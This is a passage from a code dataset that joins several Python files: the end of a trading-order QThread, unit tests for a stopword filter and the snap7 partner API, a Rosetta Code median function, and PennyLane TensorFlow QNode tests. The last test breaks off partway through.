            self.signeler.emit(True, "Limit Order Success", "Limit Buy On Account: " + str(self.accountid) + " For Amount: " + str(self.amount) + " At Price: " + str(self.price))
        except Exception as e:
            self.signeler.emit(False, "Limit Buy Order Error" , "Failed to limit buy on " + str(self.accountid) + " for amount: " + str(self.amount) + "\n" + str(e))
    def __init__(self, accountid, price , amount):
        # accountid: key into config.tradeApis; price/amount: order terms
        # (converted to float at order time).
        QThread.__init__(self)
        self.accountid = accountid
        self.price = price
        self.amount = amount
    def run(self):
        # QThread entry point: delegate to the order logic.
        self.processOrder()
a79fb2ea1f73f4d7ba3ff4c225204eedff7c7463 | 718 | py | Python | tests/test_helpers.py | michael-karotsieris/taggsy | 94bd0522963f699c5b3b94d9c7d25d447d75d148 | [
"MIT"
] | null | null | null | tests/test_helpers.py | michael-karotsieris/taggsy | 94bd0522963f699c5b3b94d9c7d25d447d75d148 | [
"MIT"
] | null | null | null | tests/test_helpers.py | michael-karotsieris/taggsy | 94bd0522963f699c5b3b94d9c7d25d447d75d148 | [
"MIT"
] | null | null | null | from unittest import TestCase
from .context import taggsy
class TestFilterStopwords(TestCase):
    """Unit tests for taggsy.helpers.filter_stopwords."""

    def test_filters_out_stopwords(self):
        """A list containing only stopwords collapses to the empty list."""
        stopwords_only = ['this', 'is', 'are']
        result = taggsy.helpers.filter_stopwords(words=stopwords_only)
        self.assertEqual(result, [])

    def test_does_not_filter_out_non_stopwords(self):
        """Content words pass through the filter untouched."""
        content_words = ['word', 'clarity']
        result = taggsy.helpers.filter_stopwords(words=content_words)
        self.assertEqual(result, content_words)
if __name__ == "__main__":
    # Bug fix: the module only does ``from unittest import TestCase`` at the
    # top, so the bare name ``unittest`` was undefined here and running the
    # file as a script raised NameError. Import the module locally.
    import unittest
    unittest.main()
| 26.592593 | 72 | 0.657382 |
96a01725d974a4f5863d067df7dc10ea9a6673ad | 229 | py | Python | Task/Averages-Median/Python/averages-median.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 5 | 2021-01-29T20:08:05.000Z | 2022-03-22T06:16:05.000Z | Task/Averages-Median/Python/averages-median.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/Averages-Median/Python/averages-median.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:40.000Z | 2018-11-09T22:08:40.000Z | def median(aray):
srtd = sorted(aray)
alen = len(srtd)
return 0.5*( srtd[(alen-1)//2] + srtd[alen//2])
# Demo: print each sample tuple alongside its median.
# NOTE: ``print`` is used as a Python 2 statement here, so this file only
# runs under Python 2 (it is a SyntaxError under Python 3).
a = (4.1, 5.6, 7.2, 1.7, 9.3, 4.4, 3.2)
print a, median(a)
a = (4.1, 7.2, 1.7, 9.3, 4.4, 3.2)
print a, median(a)
| 22.9 | 51 | 0.519651 |
886599ad0d84c0ce611ddced49e4889dff31a7ea | 3,530 | py | Python | test/test_partner.py | SimplyAutomationized/python-snap7 | 966127a712754a543eeb4a5d71d52be7a80811f9 | [
"MIT"
] | 8 | 2016-01-08T21:11:05.000Z | 2019-08-03T02:52:30.000Z | test/test_partner.py | SimplyAutomationized/python-snap7 | 966127a712754a543eeb4a5d71d52be7a80811f9 | [
"MIT"
] | null | null | null | test/test_partner.py | SimplyAutomationized/python-snap7 | 966127a712754a543eeb4a5d71d52be7a80811f9 | [
"MIT"
] | 3 | 2016-01-31T18:43:33.000Z | 2020-02-04T14:08:52.000Z | import logging
import unittest as unittest
import snap7.partner
from snap7.snap7exceptions import Snap7Exception
logging.basicConfig(level=logging.WARNING)
class TestPartner(unittest.TestCase):
def setUp(self):
self.partner = snap7.partner.Partner()
self.partner.start()
def test_as_b_send(self):
self.partner.as_b_send()
@unittest.skip("we don't recv something yet")
def test_b_recv(self):
self.partner.b_recv()
def test_b_send(self):
self.partner.b_send()
def test_check_as_b_recv_completion(self):
self.partner.check_as_b_recv_completion()
def test_check_as_b_send_completion(self):
self.partner.check_as_b_send_completion()
def test_create(self):
self.partner.create()
def test_destroy(self):
self.partner.destroy()
def test_error_text(self):
snap7.common.error_text(0, context="partner")
def test_get_last_error(self):
self.partner.get_last_error()
def test_get_param(self):
expected = (
(snap7.snap7types.LocalPort, 0),
(snap7.snap7types.RemotePort, 102),
(snap7.snap7types.PingTimeout, 750),
(snap7.snap7types.SendTimeout, 10),
(snap7.snap7types.RecvTimeout, 3000),
(snap7.snap7types.SrcRef, 256),
(snap7.snap7types.DstRef, 0),
(snap7.snap7types.SrcTSap, 0),
(snap7.snap7types.PDURequest, 480),
(snap7.snap7types.WorkInterval, 100),
(snap7.snap7types.BSendTimeout, 3000),
(snap7.snap7types.BRecvTimeout, 3000),
(snap7.snap7types.RecoveryTime, 500),
(snap7.snap7types.KeepAliveTime, 5000),
)
for param, value in expected:
self.assertEqual(self.partner.get_param(param), value)
self.assertRaises(Exception, self.partner.get_param,
snap7.snap7types.MaxClients)
def test_get_stats(self):
self.partner.get_stats()
def test_get_status(self):
self.partner.get_status()
def test_get_times(self):
self.partner.get_times()
def test_set_param(self):
values = (
(snap7.snap7types.PingTimeout, 800),
(snap7.snap7types.SendTimeout, 15),
(snap7.snap7types.RecvTimeout, 3500),
(snap7.snap7types.WorkInterval, 50),
(snap7.snap7types.SrcRef, 128),
(snap7.snap7types.DstRef, 128),
(snap7.snap7types.SrcTSap, 128),
(snap7.snap7types.PDURequest, 470),
(snap7.snap7types.BSendTimeout, 2000),
(snap7.snap7types.BRecvTimeout, 2000),
(snap7.snap7types.RecoveryTime, 400),
(snap7.snap7types.KeepAliveTime, 4000),
)
for param, value in values:
self.partner.set_param(param, value)
self.assertRaises(Exception, self.partner.set_param,
snap7.snap7types.RemotePort, 1)
def test_set_recv_callback(self):
self.partner.set_recv_callback()
def test_set_send_callback(self):
self.partner.set_send_callback()
def test_start(self):
self.partner.start()
def test_start_to(self):
self.partner.start_to('0.0.0.0', '0.0.0.0', 0, 0)
def test_stop(self):
self.partner.stop()
def test_wait_as_b_send_completion(self):
self.assertRaises(Snap7Exception, self.partner.wait_as_b_send_completion)
# Allow running this test module directly: ``python test_partner.py``.
if __name__ == '__main__':
    unittest.main()
| 30.17094 | 81 | 0.633144 |
9a2077225534ddcaded39bba9108c9b10ed9519f | 25,916 | py | Python | tests/test_tf.py | InduManimaran/pennylane | 375d25acc7bd2e6d5243b5273958b26513c33189 | [
"Apache-2.0"
] | 2 | 2021-06-29T01:30:08.000Z | 2021-08-23T10:38:52.000Z | tests/test_tf.py | InduManimaran/pennylane | 375d25acc7bd2e6d5243b5273958b26513c33189 | [
"Apache-2.0"
] | null | null | null | tests/test_tf.py | InduManimaran/pennylane | 375d25acc7bd2e6d5243b5273958b26513c33189 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for the :mod:`pennylane.interface.tf` QNode interface.
"""
import pytest
import numpy as np
try:
import tensorflow as tf
if tf.__version__[0] == "1":
import tensorflow.contrib.eager as tfe
tf.enable_eager_execution()
Variable = tfe.Variable
else:
from tensorflow import Variable
except ImportError as e:
pass
import pennylane as qml
from pennylane.qnode import _flatten, unflatten, QNode, QuantumFunctionError
from pennylane.plugins.default_qubit import CNOT, Rotx, Roty, Rotz, I, Y, Z
from pennylane._device import DeviceError
def expZ(state):
    """Analytic Pauli-Z expectation value of a single-qubit state vector.

    For amplitudes [a, b] this is |a|**2 - |b|**2.
    """
    probabilities = np.abs(state) ** 2
    return probabilities[0] - probabilities[1]
@pytest.mark.usefixtures("skip_if_no_tf_support")
class TestTFQNodeExceptions():
    """TFQNode basic tests.

    Each test defines a deliberately malformed quantum function, wraps it as
    a TensorFlow-interface QNode, and asserts that evaluating it raises the
    expected QuantumFunctionError/DeviceError. Errors surface at call time
    (not at decoration time) because pennylane builds the circuit on the
    first evaluation.
    """
    def test_qnode_fails_on_wrong_return_type(self, qubit_device_2_wires):
        """The qfunc must return only Expectations"""
        @qml.qnode(qubit_device_2_wires, interface='tf')
        def qf(x):
            qml.RX(x, wires=[0])
            # invalid: mixes an observable with a plain float in the return
            return qml.expval(qml.PauliZ(0)), 0.3
        with pytest.raises(QuantumFunctionError, match='must return either'):
            qf(Variable(0.5))
    def test_qnode_fails_on_expval_not_returned(self, qubit_device_2_wires):
        """All expectation values in the qfunc must be returned"""
        @qml.qnode(qubit_device_2_wires, interface='tf')
        def qf(x):
            qml.RX(x, wires=[0])
            # invalid: measured but dropped from the return value
            ex = qml.expval(qml.PauliZ(1))
            return qml.expval(qml.PauliZ(0))
        with pytest.raises(QuantumFunctionError, match='All measured observables'):
            qf(Variable(0.5))
    def test_qnode_fails_on_wrong_expval_order(self, qubit_device_2_wires):
        """Expvals must be returned in the order they were created in"""
        @qml.qnode(qubit_device_2_wires, interface='tf')
        def qf(x):
            qml.RX(x, wires=[0])
            ex = qml.expval(qml.PauliZ(1))
            # invalid: returned in the opposite order to creation
            return qml.expval(qml.PauliZ(0)), ex
        with pytest.raises(QuantumFunctionError, match='All measured observables'):
            qf(Variable(0.5))
    def test_qnode_fails_on_gates_after_measurements(self, qubit_device_2_wires):
        """Gates have to precede measurements"""
        @qml.qnode(qubit_device_2_wires, interface='tf')
        def qf(x):
            qml.RX(x, wires=[0])
            ev = qml.expval(qml.PauliZ(1))
            # invalid: gate applied after a measurement was queued
            qml.RY(0.5, wires=[0])
            return ev
        with pytest.raises(QuantumFunctionError, match='gates must precede'):
            qf(Variable(0.5))
    def test_qnode_fails_on_multiple_measurements_of_same_wire(self, qubit_device_2_wires):
        """A wire can only be measured once"""
        @qml.qnode(qubit_device_2_wires, interface='tf')
        def qf(x):
            qml.RX(x, wires=[0])
            qml.CNOT(wires=[0, 1])
            # invalid: wire 0 measured twice (PauliZ and PauliX)
            return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)), qml.expval(qml.PauliX(0))
        with pytest.raises(QuantumFunctionError, match='can only be measured once'):
            qf(Variable(0.5))
    def test_qnode_fails_on_qfunc_with_too_many_wires(self, qubit_device_2_wires):
        """The device must have sufficient wires for the qfunc"""
        @qml.qnode(qubit_device_2_wires, interface='tf')
        def qf(x):
            qml.RX(x, wires=[0])
            # invalid: wire 2 does not exist on a 2-wire device
            qml.CNOT(wires=[0, 2])
            return qml.expval(qml.PauliZ(0))
        with pytest.raises(QuantumFunctionError, match='applied to invalid wire'):
            qf(Variable(0.5))
    def test_qnode_fails_on_combination_of_cv_and_qbit_ops(self, qubit_device_1_wire):
        """CV and discrete operations must not be mixed"""
        @qml.qnode(qubit_device_1_wire, interface='tf')
        def qf(x):
            qml.RX(x, wires=[0])
            # invalid: continuous-variable gate in a qubit circuit
            qml.Displacement(0.5, 0, wires=[0])
            return qml.expval(qml.PauliZ(0))
        with pytest.raises(QuantumFunctionError, match='Continuous and discrete'):
            qf(Variable(0.5))
    def test_qnode_fails_for_cv_ops_on_qubit_device(self, qubit_device_1_wire):
        """A qubit device cannot execute CV operations"""
        @qml.qnode(qubit_device_1_wire, interface='tf')
        def qf(x):
            qml.Displacement(0.5, 0, wires=[0])
            return qml.expval(qml.X(0))
        with pytest.raises(DeviceError, match='Gate [a-zA-Z]+ not supported on device'):
            qf(Variable(0.5))
    def test_qnode_fails_for_cv_observables_on_qubit_device(self, qubit_device_1_wire):
        """A qubit device cannot measure CV observables"""
        @qml.qnode(qubit_device_1_wire, interface='tf')
        def qf(x):
            return qml.expval(qml.X(0))
        with pytest.raises(DeviceError, match='Observable [a-zA-Z]+ not supported on device'):
            qf(Variable(0.5))
@pytest.mark.usefixtures("skip_if_no_tf_support")
class TestTFQNodeParameterHandling:
"""Test that the TFQNode properly handles the parameters of qfuncs"""
def test_qnode_fanout(self, qubit_device_1_wire, tol):
"""Tests that qnodes can compute the correct function when the same parameter is used in multiple gates."""
@qml.qnode(qubit_device_1_wire, interface='tf')
def circuit(reused_param, other_param):
qml.RX(reused_param, wires=[0])
qml.RZ(other_param, wires=[0])
qml.RX(reused_param, wires=[0])
return qml.expval(qml.PauliZ(0))
thetas = tf.linspace(-2*np.pi, 2*np.pi, 7)
for reused_param in thetas:
for theta in thetas:
other_param = theta ** 2 / 11
y_eval = circuit(reused_param, other_param)
Rx = Rotx(reused_param.numpy())
Rz = Rotz(other_param.numpy())
zero_state = np.array([1.,0.])
final_state = (Rx @ Rz @ Rx @ zero_state)
y_true = expZ(final_state)
assert np.allclose(y_eval, y_true, atol=tol, rtol=0)
def test_qnode_array_parameters_scalar_return(self, qubit_device_1_wire, tol):
"""Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow.
Test case for a circuit that returns a scalar."""
# The objective of this test is not to check if the results are correctly calculated,
# but to check that the interoperability of the different return types works.
@qml.qnode(qubit_device_1_wire, interface='tf')
def circuit(dummy1, array, dummy2):
qml.RY(0.5 * array[0,1], wires=0)
qml.RY(-0.5 * array[1,1], wires=0)
return qml.expval(qml.PauliX(0)) # returns a scalar
grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4))
cost_target = 1.03257
args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13))
def cost(x, array, y):
c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32)
return c +0.5*array[0,0] +x -0.4*y
with tf.GradientTape() as tape:
cost_res = cost(*args)
grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])])
assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0)
assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0)
def test_qnode_array_parameters_1_vector_return(self, qubit_device_1_wire, tol):
"""Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow
Test case for a circuit that returns a 1-vector."""
# The objective of this test is not to check if the results are correctly calculated,
# but to check that the interoperability of the different return types works.
@qml.qnode(qubit_device_1_wire, interface='tf')
def circuit(dummy1, array, dummy2):
qml.RY(0.5 * array[0,1], wires=0)
qml.RY(-0.5 * array[1,1], wires=0)
return qml.expval(qml.PauliX(0)), # note the comma, returns a 1-vector
grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4))
cost_target = 1.03257
args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13))
def cost(x, array, y):
c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32)
c = c[0] # get a scalar
return c +0.5*array[0,0] +x -0.4*y
with tf.GradientTape() as tape:
cost_res = cost(*args)
grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])])
assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0)
assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0)
def test_qnode_array_parameters_2_vector_return(self, qubit_device_2_wires, tol):
"""Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow
Test case for a circuit that returns a 2-vector."""
# The objective of this test is not to check if the results are correctly calculated,
# but to check that the interoperability of the different return types works.
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit(dummy1, array, dummy2):
qml.RY(0.5 * array[0,1], wires=0)
qml.RY(-0.5 * array[1,1], wires=0)
qml.RY(array[1,0], wires=1)
return qml.expval(qml.PauliX(0)), qml.expval(qml.PauliX(1)) # returns a 2-vector
grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4))
cost_target = 1.03257
args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13))
def cost(x, array, y):
c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32)
c = c[0] # get a scalar
return c +0.5*array[0,0] +x -0.4*y
with tf.GradientTape() as tape:
cost_res = cost(*args)
grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])])
assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0)
assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0)
def test_array_parameters_evaluate(self, qubit_device_2_wires, tol):
"""Test that array parameters gives same result as positional arguments."""
a, b, c = tf.constant(0.5), tf.constant(0.54), tf.constant(0.3)
def ansatz(x, y, z):
qml.QubitStateVector(np.array([1, 0, 1, 1])/np.sqrt(3), wires=[0, 1])
qml.Rot(x, y, z, wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliY(1))
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit1(x, y, z):
return ansatz(x, y, z)
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit2(x, array):
return ansatz(x, array[0], array[1])
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit3(array):
return ansatz(*array)
positional_res = circuit1(a, b, c)
array_res1 = circuit2(a, Variable([b, c]))
array_res2 = circuit3(Variable([a, b, c]))
assert np.allclose(positional_res.numpy(), array_res1.numpy(), atol=tol, rtol=0)
assert np.allclose(positional_res.numpy(), array_res2.numpy(), atol=tol, rtol=0)
def test_multiple_expectation_different_wires(self, qubit_device_2_wires, tol):
"""Tests that qnodes return multiple expectation values."""
a, b, c = Variable(0.5), Variable(0.54), Variable(0.3)
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit(x, y, z):
qml.RX(x, wires=[0])
qml.RZ(y, wires=[0])
qml.CNOT(wires=[0, 1])
qml.RY(y, wires=[0])
qml.RX(z, wires=[0])
return qml.expval(qml.PauliY(0)), qml.expval(qml.PauliZ(1))
res = circuit(a, b, c)
out_state = np.kron(Rotx(c.numpy()), I) @ np.kron(Roty(b.numpy()), I) @ CNOT \
@ np.kron(Rotz(b.numpy()), I) @ np.kron(Rotx(a.numpy()), I) @ np.array([1, 0, 0, 0])
ex0 = np.vdot(out_state, np.kron(Y, I) @ out_state)
ex1 = np.vdot(out_state, np.kron(I, Z) @ out_state)
ex = np.array([ex0, ex1])
assert np.allclose(ex, res.numpy(), atol=tol, rtol=0)
def test_multiple_keywordargs_used(self, qubit_device_2_wires, tol):
"""Tests that qnodes use multiple keyword arguments."""
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit(w, x=None, y=None):
qml.RX(x, wires=[0])
qml.RX(y, wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
c = circuit(tf.constant(1.), x=np.pi, y=np.pi)
assert np.allclose(c.numpy(), [-1., -1.], atol=tol, rtol=0)
def test_multidimensional_keywordargs_used(self, qubit_device_2_wires, tol):
"""Tests that qnodes use multi-dimensional keyword arguments."""
def circuit(w, x=None):
qml.RX(x[0], wires=[0])
qml.RX(x[1], wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
c = circuit(tf.constant(1.), x=[np.pi, np.pi])
assert np.allclose(c.numpy(), [-1., -1.], atol=tol, rtol=0)
def test_keywordargs_for_wires(self, qubit_device_2_wires, tol):
"""Tests that wires can be passed as keyword arguments."""
default_q = 0
def circuit(x, q=default_q):
qml.RY(x, wires=0)
return qml.expval(qml.PauliZ(q))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
c = circuit(tf.constant(np.pi), q=1)
assert np.allclose(c, 1., atol=tol, rtol=0)
c = circuit(tf.constant(np.pi))
assert np.allclose(c.numpy(), -1., atol=tol, rtol=0)
def test_keywordargs_used(self, qubit_device_1_wire, tol):
"""Tests that qnodes use keyword arguments."""
def circuit(w, x=None):
qml.RX(x, wires=[0])
return qml.expval(qml.PauliZ(0))
circuit = qml.QNode(circuit, qubit_device_1_wire).to_tf()
c = circuit(tf.constant(1.), x=np.pi)
assert np.allclose(c.numpy(), -1., atol=tol, rtol=0)
def test_mixture_numpy_tensors(self, qubit_device_2_wires, tol):
"""Tests that qnodes work with python types and tensors."""
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit(w, x, y):
qml.RX(x, wires=[0])
qml.RX(y, wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
c = circuit(tf.constant(1.), np.pi, np.pi).numpy()
assert np.allclose(c, [-1., -1.], atol=tol, rtol=0)
def test_keywordarg_updated_in_multiple_calls(self, qubit_device_2_wires):
"""Tests that qnodes update keyword arguments in consecutive calls."""
def circuit(w, x=None):
qml.RX(w, wires=[0])
qml.RX(x, wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
c1 = circuit(tf.constant(0.1), x=tf.constant(0.))
c2 = circuit(tf.constant(0.1), x=np.pi)
assert c1[1] != c2[1]
def test_keywordarg_passes_through_classicalnode(self, qubit_device_2_wires, tol):
"""Tests that qnodes' keyword arguments pass through classical nodes."""
def circuit(w, x=None):
qml.RX(w, wires=[0])
qml.RX(x, wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
def classnode(w, x=None):
return circuit(w, x=x)
c = classnode(tf.constant(0.), x=np.pi)
assert np.allclose(c.numpy(), [1., -1.], atol=tol, rtol=0)
    def test_keywordarg_gradient(self, qubit_device_2_wires, tol):
        """Tests that qnodes' keyword arguments work with gradients.

        The keyword argument selects the initial basis state; flipping the
        first qubit from |0> to |1> negates <Z> and therefore flips the sign
        of the analytic gradient.
        """
        def circuit(x, y, input_state=np.array([0, 0])):
            qml.BasisState(input_state, wires=[0, 1])
            qml.RX(x, wires=[0])
            qml.RY(y, wires=[0])
            return qml.expval(qml.PauliZ(0))
        circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
        x = 0.543
        y = 0.45632
        # Analytic gradient of <Z> = cos(x)cos(y) for the |1..> branch (sign
        # flips for |0..>): d/dx = -sin(x)cos(y), d/dy = -cos(x)sin(y).
        expected_grad = np.array([np.sin(x)*np.cos(y), np.sin(y)*np.cos(x)])
        x_t = Variable(x)
        y_t = Variable(y)
        # test first basis state against analytic result
        with tf.GradientTape() as tape:
            c = circuit(x_t, y_t, input_state=np.array([0, 0]))
        grads = np.array(tape.gradient(c, [x_t, y_t]))
        assert np.allclose(grads, -expected_grad, atol=tol, rtol=0)
        # test third basis state against analytic result
        with tf.GradientTape() as tape:
            c = circuit(x_t, y_t, input_state=np.array([1, 0]))
        grads = np.array(tape.gradient(c, [x_t, y_t]))
        assert np.allclose(grads, expected_grad, atol=tol, rtol=0)
        # test first basis state via the default keyword argument against analytic result
        with tf.GradientTape() as tape:
            c = circuit(x_t, y_t)
        grads = np.array(tape.gradient(c, [x_t, y_t]))
        assert np.allclose(grads, -expected_grad, atol=tol, rtol=0)
@pytest.mark.usefixtures("skip_if_no_tf_support")
class TestIntegration:
    """Integration tests to ensure the TensorFlow QNode agrees with the NumPy QNode"""
    def test_qnode_evaluation_agrees(self, qubit_device_2_wires, tol):
        """Tests that simple example is consistent."""
        # The same circuit is built twice: once through the autograd interface ...
        @qml.qnode(qubit_device_2_wires, interface='autograd')
        def circuit(phi, theta):
            qml.RX(phi[0], wires=0)
            qml.RY(phi[1], wires=1)
            qml.CNOT(wires=[0, 1])
            qml.PhaseShift(theta[0], wires=0)
            return qml.expval(qml.PauliZ(0))
        # ... and once through the TensorFlow interface.
        @qml.qnode(qubit_device_2_wires, interface='tf')
        def circuit_tf(phi, theta):
            qml.RX(phi[0], wires=0)
            qml.RY(phi[1], wires=1)
            qml.CNOT(wires=[0, 1])
            qml.PhaseShift(theta[0], wires=0)
            return qml.expval(qml.PauliZ(0))
        phi = [0.5, 0.1]
        theta = [0.2]
        phi_t = Variable(phi)
        theta_t = Variable(theta)
        # Evaluating with plain Python lists vs tf.Variables must agree.
        autograd_eval = circuit(phi, theta)
        tf_eval = circuit_tf(phi_t, theta_t)
        assert np.allclose(autograd_eval, tf_eval.numpy(), atol=tol, rtol=0)
    def test_qnode_gradient_agrees(self, qubit_device_2_wires, tol):
        """Tests that simple gradient example is consistent."""
        @qml.qnode(qubit_device_2_wires, interface='autograd')
        def circuit(phi, theta):
            qml.RX(phi[0], wires=0)
            qml.RY(phi[1], wires=1)
            qml.CNOT(wires=[0, 1])
            qml.PhaseShift(theta[0], wires=0)
            return qml.expval(qml.PauliZ(0))
        @qml.qnode(qubit_device_2_wires, interface='tf')
        def circuit_tf(phi, theta):
            qml.RX(phi[0], wires=0)
            qml.RY(phi[1], wires=1)
            qml.CNOT(wires=[0, 1])
            qml.PhaseShift(theta[0], wires=0)
            return qml.expval(qml.PauliZ(0))
        phi = [0.5, 0.1]
        theta = [0.2]
        phi_t = Variable(phi)
        theta_t = Variable(theta)
        # Autograd gradient with respect to both positional arguments ...
        dcircuit = qml.grad(circuit, [0, 1])
        autograd_grad = dcircuit(phi, theta)
        # ... versus the TensorFlow gradient of the equivalent QNode.
        with tf.GradientTape() as g:
            g.watch([phi_t, theta_t])
            y = circuit_tf(phi_t, theta_t)
            tf_grad = g.gradient(y, [phi_t, theta_t])
        assert np.allclose(autograd_grad[0], tf_grad[0], atol=tol, rtol=0)
        assert np.allclose(autograd_grad[1], tf_grad[1], atol=tol, rtol=0)
# (x, y) parameter pairs shared by the parametrized tests in TestTFGradients below.
gradient_test_data = [
    (0.5, -0.1),
    (0.0, np.pi),
    (-3.6, -3.6),
    (1.0, 2.5),
]
@pytest.mark.usefixtures("skip_if_no_tf_support")
class TestTFGradients:
    """Integration tests involving gradients of QNodes and hybrid computations using the tf interface"""
    @pytest.fixture
    def qnodes(self):
        """Two QNodes to be used for the gradient tests"""
        dev = qml.device("default.qubit", wires=2)
        @qml.qnode(dev, interface="tf")
        def f(x):
            qml.RX(x, wires=0)
            return qml.expval(qml.PauliZ(0))
        @qml.qnode(dev, interface="tf")
        def g(y):
            qml.RY(y, wires=0)
            return qml.expval(qml.PauliX(0))
        return f, g
    @pytest.mark.parametrize("x, y", gradient_test_data)
    def test_addition_qnodes_gradient(self, qnodes, x, y):
        """Test the gradient of addition of two QNode circuits"""
        f, g = qnodes
        def add(a, b):
            return a + b
        xt = Variable(x)
        yt = Variable(y)
        # addition: d(a+b)/da = d(a+b)/db = 1
        with tf.GradientTape() as tape:
            tape.watch([xt, yt])
            a = f(xt)
            b = g(yt)
            y = add(a, b)
        grad = tape.gradient(y, [a, b])
        assert grad[0].numpy() == 1.0
        assert grad[1].numpy() == 1.0
        # same tensor added to itself: d(a+a)/da = 2
        with tf.GradientTape() as tape:
            tape.watch([xt, yt])
            a = f(xt)
            y = add(a, a)
        grad = tape.gradient(y, [a, a])
        assert grad[0].numpy() == 2.0
        assert grad[1].numpy() == 2.0
        # different qnodes with same input parameter added together
        with tf.GradientTape() as tape:
            tape.watch([xt, yt])
            a = f(xt)
            b = g(xt)
            y = add(a, b)
        grad = tape.gradient(y, [a, b])
        assert grad[0].numpy() == 1.0
        assert grad[1].numpy() == 1.0
    @pytest.mark.parametrize("x, y", gradient_test_data)
    def test_subtraction_qnodes_gradient(self, qnodes, x, y):
        """Test the gradient of subtraction of two QNode circuits"""
        f, g = qnodes
        def subtract(a, b):
            return a - b
        xt = Variable(x)
        yt = Variable(y)
        # subtraction: d(a-b)/da = 1, d(a-b)/db = -1
        with tf.GradientTape() as tape:
            tape.watch([xt, yt])
            a = f(xt)
            b = g(yt)
            y = subtract(a, b)
        grad = tape.gradient(y, [a, b])
        assert grad[0].numpy() == 1.0
        assert grad[1].numpy() == -1.0
    @pytest.mark.parametrize("x, y", gradient_test_data)
    def test_multiplication_qnodes_gradient(self, qnodes, x, y):
        """Test the gradient of multiplication of two QNode circuits"""
        f, g = qnodes
        def mult(a, b):
            return a * b
        xt = Variable(x)
        yt = Variable(y)
        # multiplication: d(a*b)/da = b, d(a*b)/db = a
        with tf.GradientTape() as tape:
            tape.watch([xt, yt])
            a = f(xt)
            b = g(yt)
            y = mult(a, b)
        grad = tape.gradient(y, [a, b])
        assert grad[0].numpy() == b.numpy()
        assert grad[1].numpy() == a.numpy()
    @pytest.mark.parametrize("x, y", gradient_test_data)
    def test_division_qnodes_gradient(self, qnodes, x, y, tol):
        """Test the gradient of division of two QNode circuits"""
        f, g = qnodes
        def div(a, b):
            return a / b
        xt = Variable(x)
        yt = Variable(y)
        # division: d(a/b)/da = 1/b, d(a/b)/db = -a/b**2
        with tf.GradientTape() as tape:
            tape.watch([xt, yt])
            a = f(xt)
            b = g(yt)
            y = div(a, b)
        grad = tape.gradient(y, [a, b])
        assert grad[0].numpy() == 1 / b.numpy()
        assert np.allclose(grad[1].numpy(), -a.numpy() / b.numpy() ** 2, atol=tol, rtol=0)
    @pytest.mark.parametrize("x, y", gradient_test_data)
    def test_composition_qnodes_gradient(self, qnodes, x, y):
        """Test the gradient of composition of two QNode circuits"""
        f, g = qnodes
        xt = Variable(x)
        yt = Variable(y)
        # compose function with xt as input: identical computations must give
        # identical gradients on independent tapes
        with tf.GradientTape() as tape:
            tape.watch([xt])
            y = f(xt)
            grad1 = tape.gradient(y, xt)
        with tf.GradientTape() as tape:
            tape.watch([xt])
            y = f(xt)
            grad2 = tape.gradient(y, xt)
